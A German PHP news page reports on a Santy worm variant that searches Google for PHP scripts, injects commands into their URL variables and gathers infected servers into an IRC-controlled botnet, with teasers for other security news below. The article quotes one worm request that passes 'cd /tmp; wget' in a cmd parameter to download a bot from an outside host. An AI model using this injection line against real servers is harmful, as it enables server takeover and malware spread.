php-resource.de

Aktuelle Themen und News zu PHP / mySQL

Wurm attackiert PHP-Skripte

Berni | Neu | Beitrag gelesen 2771 gelesen |

 


Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de

Kommentare zum Artikel
Artikel kommentieren
 
Verwandte Beiträge
star Zahlreiche Schwachstellen in PHP
star Das Magazin PHP Solutions Ausgabe 6/2004 (7)
star Webseiten mit IE-Exploit infiziert
star Apache für DoS-Attacken anfällig
star Maguma Workbench Version 2.1 jetzt erhältlich!

 
Links zum Artikel

Weitere PHP-News und Artikel

Zahlreiche Schwachstellen in PHP

| Berni | PHP

Durch mehrere Schwachstellen in der Skript-Sprache PHP kann ein Angreifer eigenen Code auf einen Server schleusen und ausführen. Nach Angaben von Stefan Esser lassen sich einige der insgesamt sieben Lücken nur mit einem gültigen Nutzerkonto ausnutzen, ein

Beitrag gelesen 2529 Views | Neu

Das Magazin PHP Solutions Ausgabe 6/2004 (7)

| Berni | PHP

Die Themen der Ausgabe: - PHP-Obfuskatoren und Encoder im Test, - Mambo 4.5 - Power in Simplicity, - Moodle - Implementierung und Verbesserung einer kostenlosen E-Learningplattform, - Fortgeschrittene Möglichkeiten von PHP-Arrays, - PING-PONG, oder

Beitrag gelesen 2242 Views | Neu

Webseiten mit IE-Exploit infiziert

| Berni | PHP

Das Internet Storm Center (ISC) meldet gleich mehrere Webseiten auf denen Code zur Ausnutzung einer aktuellen Sicherheitslücke des Internet Explorers eingeschleust wurde. Eine unbekannte Gruppe scheint in die viel besuchten Seiten in England, den Niederla

Beitrag gelesen 2566 Views | Neu

Apache für DoS-Attacken anfällig

| Berni | PHP

Im Apache-Webserver 2.0.x wurde eine Schwachstelle entdeckt, mit der Angreifer den Betrieb des Servers beeinträchtigen können. Nach Angaben von Chintan Trivedi, Entdecker des Fehlers, reicht es aus, kontinuierlich HTTP-GET-Anfragen mit überlangen Headern

Beitrag gelesen 2749 Views | Neu

Maguma Workbench Version 2.1 jetzt erhältlich!

| Berni | PHP

Maguma Workbench, die neueste PHP IDE mit Plugin-Architektur, ist ab sofort in der neuesten Version 2.1 auf unserer Webpage, www.maguma.com, erhältlich (30-Tage Testversion unter http://support.maguma.com/download/ zu finden). In der Version 2.1 haben wir

Beitrag gelesen 2899 Views | Neu

Apache-Version 1.3.33 verfügbar

| Berni | PHP

Kaum eine Woche nach Veröffentlichung der Apache-Version 1.3.32 ist bereits Version 1.3.33 verfügbar, die im Wesentlichen mehrere Fehler behebt. Unter anderem ist nun eine Schwachstelle beseitigt, die in bestimmten Fällen beim Einsatz des Web-Hosting-Mana

Beitrag gelesen 3391 Views | Neu

Sicherheitsloch in Windows-SSH-Client PuTTY

| Berni | PHP

Durch eine Schwachstelle im freien Windows-SSH-Client PuTTY können präparierte SSH-Server auf dem Desktop beliebigen Code ausführen. Laut Advisory reicht bereits die Kontaktaufnahme mit einem Server, damit Angreifer den Fehler auszunutzen können. Da der A

Beitrag gelesen 2807 Views | Neu

MySQL 4.1 ist fertig

| Berni | MySQL

MySQL hat seine gleichnamige Open-Source-Datenbank jetzt in der Version 4.1 für den produktiven Einsatz freigegeben. Damit liegt MySQL 4.1 jetzt in einer stabilen Version vor. Wichtigste Neuerung in MySQL 4.1 ist vor allem die Einführung von logisch versc

Beitrag gelesen 2819 Views | Neu

Navigation -> Seitenanzahl : (96)

 « Anfang ...  «  36 37 38 39 40 41 42 43 44 45 46 47 48  » ... Ende »

Über den Autor
Berni

Berni

Status
Premium Mitglied

Beruf
Selbstständig

Mitglied seit:
22.01.2001

letzte Aktivität
11.05.2021